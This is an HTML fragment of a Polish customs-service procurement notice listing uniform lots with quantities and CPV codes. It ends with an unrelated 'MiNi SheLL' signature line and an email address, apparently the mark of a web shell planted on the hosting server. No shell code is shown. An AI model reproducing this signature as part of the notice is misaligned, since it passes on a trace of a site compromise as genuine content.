<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.81.50.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zakup wraz z dostawą rękawiczek skórzanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 8 -  Zakup wraz z dostawą rękawiczek skórzanych
Rękawiczki należy dostarczyć w ilości podanej poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ  
Nazwa składnika	Jednostka miary	Ilość
Rękawiczki zimowe	par	160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zakup wraz z dostawą krawatów i krawatek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 9 -  Zakup wraz z dostawą krawatów i krawatek 
Krawaty i krawatki należy dostarczyć w ilościach podanych poniżej oraz  zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 
Nazwa składnika	Jednostka miary	Ilość
Krawat	szt.	100
Krawatka	szt.	85.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.30.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zakup wraz z dostawą pasków do spodni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 10 - Zakup wraz z dostawą pasków do spodni
Paski należy dostarczyć  w ilości podanej poniżej oraz zgodnie z opisem zawartym w Załączniku N 6 do SIWZ 
Nazwa składnika	Jednostka miary	Ilość
Pasek do spodni	szt.	114.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zakup wraz z dostawą dystynkcji i sznurów galowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 11- Zakup wraz z dostawą dystynkcji i sznurów galowych
Dystynkcje i sznury galowe należy dostarczyć w ilościach podanych poniżej oraz  zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 
Nazwa składnika	Jednostka miary	Ilość
Dystynkcje - nasuwki	par	655
Sznur galowy	szt.	157.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.11.30-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zakup wraz z dostawą składników ubioru specjalnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 12 - Zakup wraz z dostawą składników ubioru specjalnego
Poszczególne składniki ubioru specjalnego należy dostarczyć w ilościach podanych poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 7 do SIWZ.  

Nazwa składnika	Jednostka miary	Ilość
Koszulka typu polo koloru czarnego	szt.	210
Koszulobluza z długim rękawem, koloru czarnego+ naszyty emblemat Służba Celna oraz emblemat komórek zwalczania przestępczości	szt.	105
Koszulobluza z krótkim rękawem, koloru czarnego+ naszyty emblemat Służba Celna oraz emblemat komórek zwalczania przestępczości	szt.	105
Spodnie polowe letnie 	par	105
Spodnie polowe zimowe	par	105
Podkoszulek z krótkim rękawem	szt.	210
Czapka polowa letnia koloru czarnego	szt.	105
Emblemat przewodnik psa służbowego	szt.	14
Komplet całoroczny + naszyty emblemat Służba Celna oraz emblemat komórek zwalczania przestępczości	kpl.	1
Czapka polowa zimowa koloru czarnego	szt.	1
Kombinezon jednoczęściowy koloru czarnego + naszyty emblemat Służba Celna oraz emblemat komórek zwalczania przestępczości	szt.	1
Czapka typu dokerka koloru czarnego	szt.	1
Rękawiczki ochronne z powłoką antypoślizgową	par	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.23.40.00-8, 18.33.00.00-1, 18.42.40.00-7, 18.44.33.20-5, 39.56.11.30-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zakup wraz z dostawą butów na grubej podeszwie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 13 - Zakup wraz z dostawą butów na grubej podeszwie.
Buty, będące składnikiem ubioru specjalnego, należy dostarczyć w ilościach podanych poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 7. 

Nazwa składnika	Jednostka miary	Ilość 
Buty letnie na grubej podeszwie	para	105
Buty wysokie na grubej podeszwie	para	105.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.81.50.00-5, 18.81.51.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com